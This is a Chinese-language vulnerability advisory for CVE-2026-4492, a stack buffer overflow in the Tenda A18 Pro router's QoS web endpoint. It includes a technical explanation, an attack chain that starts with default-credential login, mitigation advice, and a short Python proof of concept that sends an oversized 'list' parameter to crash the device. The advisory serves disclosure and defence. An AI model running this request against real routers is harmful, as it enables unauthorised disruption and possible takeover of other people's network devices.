CVE-2026-4492 CVSS 8.8 高危

CVE-2026-4492 Tenda A18 Pro栈溢出漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4492

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda A18 Pro

漏洞概述

Tenda A18 Pro路由器固件版本02.03.02.28中存在严重的栈缓冲区溢出漏洞。该漏洞位于/goform/formSetQosBand接口的set_qosMib_list函数中，由于未对用户输入的list参数进行严格的长度校验，导致程序在处理时发生栈溢出。远程攻击者需具备低权限账号访问Web界面，即可利用此漏洞，通过构造恶意HTTP请求，可能导致设备崩溃、敏感信息泄露或执行任意代码，对网络安全构成严重威胁。

技术细节

该漏洞是典型的栈缓冲区溢出漏洞，根因在于Tenda A18 Pro固件中处理QoS配置的代码逻辑缺陷。具体而言，当Web服务器接收发往/goform/formSetQosBand的POST请求时，set_qosMib_list函数会被调用以解析list参数。由于代码中使用了不安全的内存拷贝操作（如strcpy），且未对输入数据的长度进行任何边界检查，攻击者可以发送超长的字符串作为参数值。由于认证要求为低权限（PR:L），攻击者首先通过Web登录获取会话，随后发送特制Payload覆盖栈上的返回地址。这种内存破坏允许攻击者劫持程序执行流，跳转到恶意指令，从而在设备上下文中执行任意系统命令，获得设备的最高控制权。

攻击链分析

STEP 1

发现阶段

攻击者扫描网络，识别目标Tenda A18 Pro设备及其Web管理服务。

STEP 2

获取认证

攻击者利用弱口令或默认凭证登录Web管理界面，获取低权限会话。

STEP 3

漏洞利用

攻击者向/goform/formSetQosBand接口发送包含超长list参数的恶意POST请求，触发栈溢出。

STEP 4

代码执行

覆盖返回地址，控制程序流程执行Shellcode，获取设备Root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip, cookies):
    url = f"http://{target_ip}/goform/formSetQosBand"
    # Payload to trigger stack overflow
    # Adjust length based on buffer size analysis
    payload = {
        "list": "A" * 1000  
    }
    
    try:
        response = requests.post(url, data=payload, cookies=cookies, timeout=5)
        print(f"Status Code: {response.status_code}")
        if response.status_code == 200 or response.status_code == 500:
            print("Exploit sent successfully. Check device for crash or shell.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP and authenticated cookies
    target = "192.168.0.1"
    session_cookies = {"CookieName": "value"}
    exploit(target, session_cookies)

影响范围

Tenda A18 Pro 02.03.02.28

防御指南

临时缓解措施

建议用户立即检查Tenda官方网站，下载并安装修复了该漏洞的最新固件。在无法立即升级的情况下，应关闭路由器的远程Web管理功能，仅允许受信任的本地IP访问管理界面，并加强访问控制策略，以降低漏洞被攻击者利用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4492
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4492
3 Details https://www.cvedetails.com/cve/CVE-2026-4492/
4 VulDB https://vuldb.com/cve/CVE-2026-4492
5 Link https://github.com/lilukun337/cve/issues/4
6 Link https://vuldb.com/?ctiid.352018
7 Link https://vuldb.com/?id.352018
8 Link https://vuldb.com/?submit.773682
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表